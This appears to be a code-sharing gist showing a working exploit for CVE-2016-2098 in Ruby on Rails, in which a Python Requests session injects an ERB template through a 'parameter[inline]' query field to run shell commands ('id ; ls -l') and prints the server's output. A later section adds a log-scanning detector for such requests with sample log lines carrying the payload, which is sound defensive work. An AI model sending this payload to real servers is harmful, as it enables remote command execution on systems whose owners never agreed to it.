@FrancoisCapon
Created March 4, 2023 13:04
CVE-2016-2098 exploit with Requests using Python Interpreter

CVE

Ruby

Python > Requests

Exploit example

$ python3
...
>>> import requests
>>> url = 'http://the.target.tld'
>>> template = 'oscmd<%= `id ; ls -l`  %>oscmd'
>>> httprequest = requests.get(url, params = {'parameter[inline]' : template})
>>> httprequest.status_code ; print(httprequest.text.split("oscmd")[1])
200
uid=1000(webrick) gid=1000(webrick) groups=1000(webrick)
total 84
-rw-r--r-- 1 webrick webrick  765 Apr 15  2021 Gemfile
-rw-r--r-- 1 webrick root    2455 Apr 15  2021 Gemfile.lock
-rw-r--r-- 1 webrick webrick 9208 Apr 15  2021 README.rdoc
-rw-r--r-- 1 webrick webrick  270 Apr 15  2021 Rakefile
drwxr-xr-x 1 webrick webrick 4096 Apr 15  2021 app
drwxr-xr-x 1 webrick webrick 4096 Apr 15  2021 config
-rw-r--r-- 1 webrick webrick  155 Apr 15  2021 config.ru
drwxr-xr-x 1 webrick webrick 4096 Apr 15  2021 db
...
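
The request above leaves a recognizable trace in web server logs: a query parameter whose nested sub-key is `inline`, usually carrying ERB tags in its value. The following is an added detection example, not part of the original gist. The combined log format, the constructed sample lines, and the helper names `classify` and `scan` are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample lines in combined log format (not from a real server).
SAMPLE_LOG = """\
203.0.113.5 - - [04/Mar/2023:13:04:01 +0000] "GET /?parameter%5Binline%5D=oscmd%3C%25%3D+%60id%60+%25%3Eoscmd HTTP/1.1" 200 512 "-" "python-requests/2.28.2"
198.51.100.7 - - [04/Mar/2023:13:05:10 +0000] "GET /?parameter=index HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [04/Mar/2023:13:06:22 +0000] "GET /search?q=inline+styles&page[number]=2 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.0.2.44 - - [04/Mar/2023:13:07:30 +0000] "GET /?parameter[inline]=hello HTTP/1.1" 200 300 "-" "curl/8.0.1"
"""

# client, request target and status from one combined-format line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')
# A nested parameter whose sub-key is "inline", e.g. parameter[inline]
INLINE_KEY_RE = re.compile(r'^[^\[\]]+\[inline\]$')
# An ERB tag in the decoded value, e.g. <%= ... %>
ERB_TAG_RE = re.compile(r'<%.*?%>', re.S)


def classify(line):
    """Return a finding dict for a suspicious log line, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target, status = m.group(1), m.group(2), int(m.group(3))
    # Only the query string is visible in access logs; POST bodies are not.
    query = target.partition("?")[2]
    for key, value in parse_qsl(query, keep_blank_values=True):
        if INLINE_KEY_RE.match(key):
            # ERB tags in the value mean template code was submitted.
            severity = "high" if ERB_TAG_RE.search(value) else "medium"
            return {"client": client, "param": key,
                    "severity": severity, "status": status}
    return None


def scan(log_text):
    """Classify every line and keep only the findings."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A `high` finding with status 200 deserves priority review, since the response may have carried rendered output back to the client.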